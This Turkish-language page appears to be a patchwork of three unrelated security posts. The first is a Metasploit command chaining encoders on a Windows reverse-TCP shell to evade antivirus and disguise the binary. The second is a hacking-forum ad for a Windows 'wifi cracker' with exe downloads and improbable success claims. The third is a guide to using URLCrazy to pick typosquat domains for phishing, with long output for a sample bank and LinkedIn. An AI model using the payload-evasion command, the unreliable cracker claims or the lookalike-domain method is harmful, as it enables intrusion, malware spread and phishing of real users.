Bu çalışma, metasploit framework projesinde bulunan farklı encoderları kullanarak meterpreter içeriğini antivirusler tarafından tanınmaz yapıp, ayrıca masum bir uygulama imajı kazandırmak üzere bir kaç satır kod eklemektedir.

Metasploit Multi Encoder Kullanımı

./msfpayload windows/shell/reverse_tcp  LHOST=1.1.1.1 LPORT=4443 EXITFUNC=thread R |  ./msfencode -e x86/shikata_ga_nai -c 2 -t raw | ./msfencode -e x86/jmp_call_additive -c 2 -t raw | ./msfencode -e x86/call4_dword_xor  -c 2 -t raw | ./msfencode -e x86/jmp_call_additive -c 2 -t raw | ./msfencode -e x86/call4_dword_xor  -c 2 -t exe -o ajan007.exe

Raw olarak encoderlara gönderilen meterpreter içeriği, encoding işleminden  sonra hex olarak bir dosyaya aktarılır ve ardından bir kaç satır çöp kod (c++ kodu)   eklenerek binary dosya oluşturulur.

Bu uygulamayı yapan v5.sh scriptinden bir ekran görüntüsü

Uygulama eğitim ve test amaçlı geliştirilmiştir, kaynak kodu BGA eğitimine katılanlara ve pentest yapılan firmalara verilmektedir.

Bir kaç genel özelliği;

– Farklı bağlantı türlerine sahip (bind,reverse_http/https/tcp)  meterpreter payloadı oluşturabilmektedir.

– 32 bit 64 bit sistemlerde çalışabilmektedir.

– Linux, Windows ve *BSD ailesinden her türlü işletim sisteminde çalışabilmektedir.

– Unix ve Windows uygulamalarına enfekte olabilmektedir.

– Autorun Script Desteği

Wifi Kırıcı [Wındowsda Wıfı Kırma Programı!] Wifi hack Black-king

erhaba arkadaşlar. Son zamanlarda forumumuzda baya bır wıfı kırıcı ısteğınde bulunuldu.
Kandıl gecesı sızlere hedıyem olsun 
Wındows tabanlı çalışan wıfı kırıcı. Bıldığınız üzere wındows’da wıfı kırıcı yok denıcek kadar az. Hatta az sonra paylaşacağım bu programdan başka lınux bt desteğı almadan çalışan tek proje dıye bılıyorum. Neyse arkadaşlar fazla uzatmadan programa geçelım.

Wıfı kırmak aslında karmaşık bır ıştır ancak bu programla wıfıyı çok rahat bır şekılde kırabılırsınız.
Yaklaşık 5 dakıkada 2 wıfı kırmıştım ben. öğrencı evınde falan çok ışe yaramıştı benım ıçın.
Program ıçın her hangibir internete bağlı olmanıza gerek yok sadece bu verdığım programı kursanız yeterlı.

Sorularınız ve cevapları – Çıkabılecek bütün sorunların çözümleri

Vıdeolu anlatım yaptım sızler ıçın

Vıdeolu Anlatım IZLE

Kurulum Vıdeosu Anlatım
İndir ;

Tıkla İndir v30.9

40.1 Download

40.1 Alternatıf Download

40.3 Download !

40.3 Alternatıf Download

Soru Ve Sorunlarınız IÇIN TIKLAYINIZ

Son güncelleme (Kullanımı aşşağıda mevcuttur.)
Mutlaka INDIR

Son güncelleme Alternatıf Indır

Vırus Total Tarama Sonucu

40.0 Güncelleme denetımı ;

son güncellememizle beraber zyXEL modemlerı %97 verimli sonuç alabilirsiniz.
Güvenlık sıstemı fark etmez zyXEL modemlerı %97 kırabılırsınız.
Iyı kullanımlar.

TP-Link modemlere destek eklenmıştır. TP-Link modemlerı %90 Kırabılırsınız
Iyı kullanımlar.

atheros modemlerıne destek eklenmıştır. atheros modemlerı %99 kırabılırsınız artık. 

40.1 Güncelleme Denetımı : 

Vadafonelere Mobıl destek eklendı.

Wps’ye eklenen BSSID’Ler : 
74:31:70
84:9C:A6
88:03:55
1C:C6:3C
50:7E:5D

BSSID Çekım Kontrolü ;

This image has been resized.Click to view original image

This image has been resized.Click to view original image

Başlangıçlı ıd , port , numara başlangıçlı wıfılerı artık wps’ye düşürebılırsınız.

zyxel modemlere %100 destek
aırteslere %97 destek eklenmıştır.

Algorıtma güçlendırılmıştır.

Evet arkadaşlar yenı bır exe paylaşıyorum. exemızı ındırmek ıçın : jswscapp.exe Yada Tıkla

Bilgisayarım – C – ProgramFılesx86 Içındekı JumpStart klasörünü bulun. Verdığım exe’yı oraya atın. dosyayı onayladıktan sonra wıfıyı tekrar kırmak ıçın ışlemı başlatın.

Yenı tasarım ;

Başlatma :

This image has been resized.Click to view original image

Kırıldıktan sonra :

This image has been resized.Click to view original image

Kıramazsa :

This image has been resized.Click to view original image

Tamamıyla tarafımca ayarlanmıştır. Yeni desteklemeler olmuştur. İyi kullanımlar Dilerim.

turkhackteam.net

Sosyal Mühendislik Saldırılarında Benzer Domainleri Bulma

Sosyal mühendislik, phishing, APT testlerinde en önemli bileşenler hedef sistemler(bilişim sistemleri, çalışan bilgileri vs) ve bu sistemlere yönelik tasarlanan senaryolardır. Saldırı denemesi öncesi toplanacak bilgiler kadar saldırı senaryosunda kullanılan argümanlar da önemlidir.
Mesela saldırı denemesinin gerçekleştirileceği kurum Lotus Domino kullanıyor ve siz testlerinizi Exchange/OWA kullanıldığını düşünerek gerçekleştiriyorsanız daha ilk adımda başarısız olmak ihtimaliniz yüksektir.


Doğrudan çalışanları hedef alan sosyal mühendislik tipi saldırılarda kullanıcılara gönderilecek e-posta içeriğinde kullanılan alan adı ne kadar kurumun adına benzerse ilk adım o kadar başarılı olur. Çoğu kullanıcı http://www.facebook.com ile www-facebook.com, http://www.fecabook.com, wwwfacebook.com arasındaki farkı bilmeyecek ve gönderilen sahte e-postadaki linki tıklayarak bilgilerini sahte sisteme girecektir.

Hedef domain ile ilgili alternatifleri araştırmak için çeşitli yöntem ve araçlar mevcuttur. Bunlar arasında en detaylı ve kapsamlı sonuç üreteni Urlcrazy’dir. Urlcrazy yazılımı kullanılarak bir alan adına ait olabilecek tüm diğer ihtimaller bulunabilir. Bunlar arasından henüz kiralanmamış olanlardan bir tanesi seçilerek sosyal mühendislik senaryosuna dahil edilebilir.

Örnek Kullanım
  
root@tht-pt12:~/urlcrazy-0.5# ./urlcrazy  -k QWERTY -r ornekbank.comURLCrazy Domain Report
Domain    : ornekbank.com
Keyboard  : qwerty
At        : 2013-01-01 21:06:15 +0200

# Please wait. 124 hostnames to process

Typo Type              Typo              CC-A  Extn  
—————————————————–
Character Omission     onekbank.com      ?     com   
Character Omission     orekbank.com      ?     com   
Character Omission     ornebank.com      ?     com   
Character Omission     ornekank.com      ?     com   
Character Omission     ornekbak.com      ?     com   
Character Omission     ornekban.com      ?     com   
Character Omission     ornekbank.cm      ?     cm    
Character Omission     ornekbnk.com      ?     com   
Character Omission     ornkbank.com      ?     com   
Character Repeat       oornekbank.com    ?     com   
Character Repeat       orneekbank.com    ?     com   
Character Repeat       ornekbaank.com    ?     com   
Character Repeat       ornekbankk.com    ?     com   
Character Repeat       ornekbannk.com    ?     com   
Character Repeat       ornekbbank.com    ?     com   
Character Repeat       ornekkbank.com    ?     com   
Character Repeat       ornnekbank.com    ?     com   
Character Repeat       orrnekbank.com    ?     com   
Character Swap         onrekbank.com     ?     com   
Character Swap         orenkbank.com     ?     com   
Character Swap         ornebkank.com     ?     com   
Character Swap         ornekabnk.com     ?     com   
Character Swap         ornekbakn.com     ?     com   
Character Swap         ornekbnak.com     ?     com   
Character Swap         ornkebank.com     ?     com   
Character Swap         ronekbank.com     ?     com   
Character Replacement  irnekbank.com     ?     com   
Character Replacement  oenekbank.com     ?     com   
Character Replacement  orbekbank.com     ?     com   
Character Replacement  ormekbank.com     ?     com   
Character Replacement  ornejbank.com     ?     com   
Character Replacement  ornekbabk.com     ?     com   
Character Replacement  ornekbamk.com     ?     com   
Character Replacement  ornekbanj.com     ?     com   
Character Replacement  ornekbanl.com     ?     com   
Character Replacement  ornekbsnk.com     ?     com   
Character Replacement  orneknank.com     ?     com   
Character Replacement  ornekvank.com     ?     com   
Character Replacement  ornelbank.com     ?     com   
Character Replacement  ornrkbank.com     ?     com   
Character Replacement  ornwkbank.com     ?     com   
Character Replacement  otnekbank.com     ?     com   
Character Replacement  prnekbank.com     ?     com   
Character Insertion    oirnekbank.com    ?     com   
Character Insertion    oprnekbank.com    ?     com   
Character Insertion    orenekbank.com    ?     com   
Character Insertion    ornbekbank.com    ?     com   
Character Insertion    ornekbanbk.com    ?     com   
Character Insertion    ornekbankj.com    ?     com   
Character Insertion    ornekbankl.com    ?     com   
Character Insertion    ornekbanmk.com    ?     com   
Character Insertion    ornekbasnk.com    ?     com   
Character Insertion    ornekbnank.com    ?     com   
Character Insertion    ornekbvank.com    ?     com   
Character Insertion    ornekjbank.com    ?     com   
Character Insertion    orneklbank.com    ?     com   
Character Insertion    ornerkbank.com    ?     com   
Character Insertion    ornewkbank.com    ?     com   
Character Insertion    ornmekbank.com    ?     com 

LinkedIN sitesi için örnek
root@bga-pt12:~/urlcrazy-0.5# ./urlcrazy  -k QWERTY -r linkedin.com
URLCrazy Domain Report
Domain    : linkedin.com
Keyboard  : qwerty
At        : 2013-01-01 21:10:17 +0200

# Please wait. 119 hostnames to process

Typo Type              Typo              CC-A  Extn  
—————————————————–
Character Omission     likedin.com       ?     com   
Character Omission     linedin.com       ?     com   
Character Omission     linkdin.com       ?     com   
Character Omission     linkedi.com       ?     com   
Character Omission     linkedin.cm       ?     cm    
Character Omission     linkedn.com       ?     com   
Character Omission     linkein.com       ?     com   
Character Omission     lnkedin.com       ?     com   
Character Repeat       liinkedin.com     ?     com   
Character Repeat       linkeddin.com     ?     com   
Character Repeat       linkediin.com     ?     com   
Character Repeat       linkedinn.com     ?     com   
Character Repeat       linkeedin.com     ?     com   
Character Repeat       linkkedin.com     ?     com   
Character Repeat       linnkedin.com     ?     com   
Character Repeat       llinkedin.com     ?     com   
Character Swap         ilnkedin.com      ?     com   
Character Swap         liknedin.com      ?     com   
Character Swap         linekdin.com      ?     com   
Character Swap         linkdein.com      ?     com   
Character Swap         linkedni.com      ?     com   
Character Swap         linkeidn.com      ?     com   
Character Swap         lnikedin.com      ?     com   
Character Replacement  kinkedin.com      ?     com   
Character Replacement  libkedin.com      ?     com   
Character Replacement  limkedin.com      ?     com   
Character Replacement  linjedin.com      ?     com   
Character Replacement  linkedib.com      ?     com   
Character Replacement  linkedim.com      ?     com   
Character Replacement  linkedon.com      ?     com   
Character Replacement  linkedun.com      ?     com   
Character Replacement  linkefin.com      ?     com   
Character Replacement  linkesin.com      ?     com   
Character Replacement  linkrdin.com      ?     com   
Character Replacement  linkwdin.com      ?     com   
Character Replacement  linledin.com      ?     com   
Character Replacement  lonkedin.com      ?     com   
Character Replacement  lunkedin.com      ?     com   
Character Insertion    linbkedin.com     ?     com   
Character Insertion    linkedfin.com     ?     com   
Character Insertion    linkedinb.com     ?     com   
Character Insertion    linkedinm.com     ?     com   
Character Insertion    linkedion.com     ?     com   
Character Insertion    linkediun.com     ?     com   
Character Insertion    linkedsin.com     ?     com

Urlcrazy aracını  http://www.morningstarsecurity.com/research/urlcrazy adresinden indirebilirsiniz.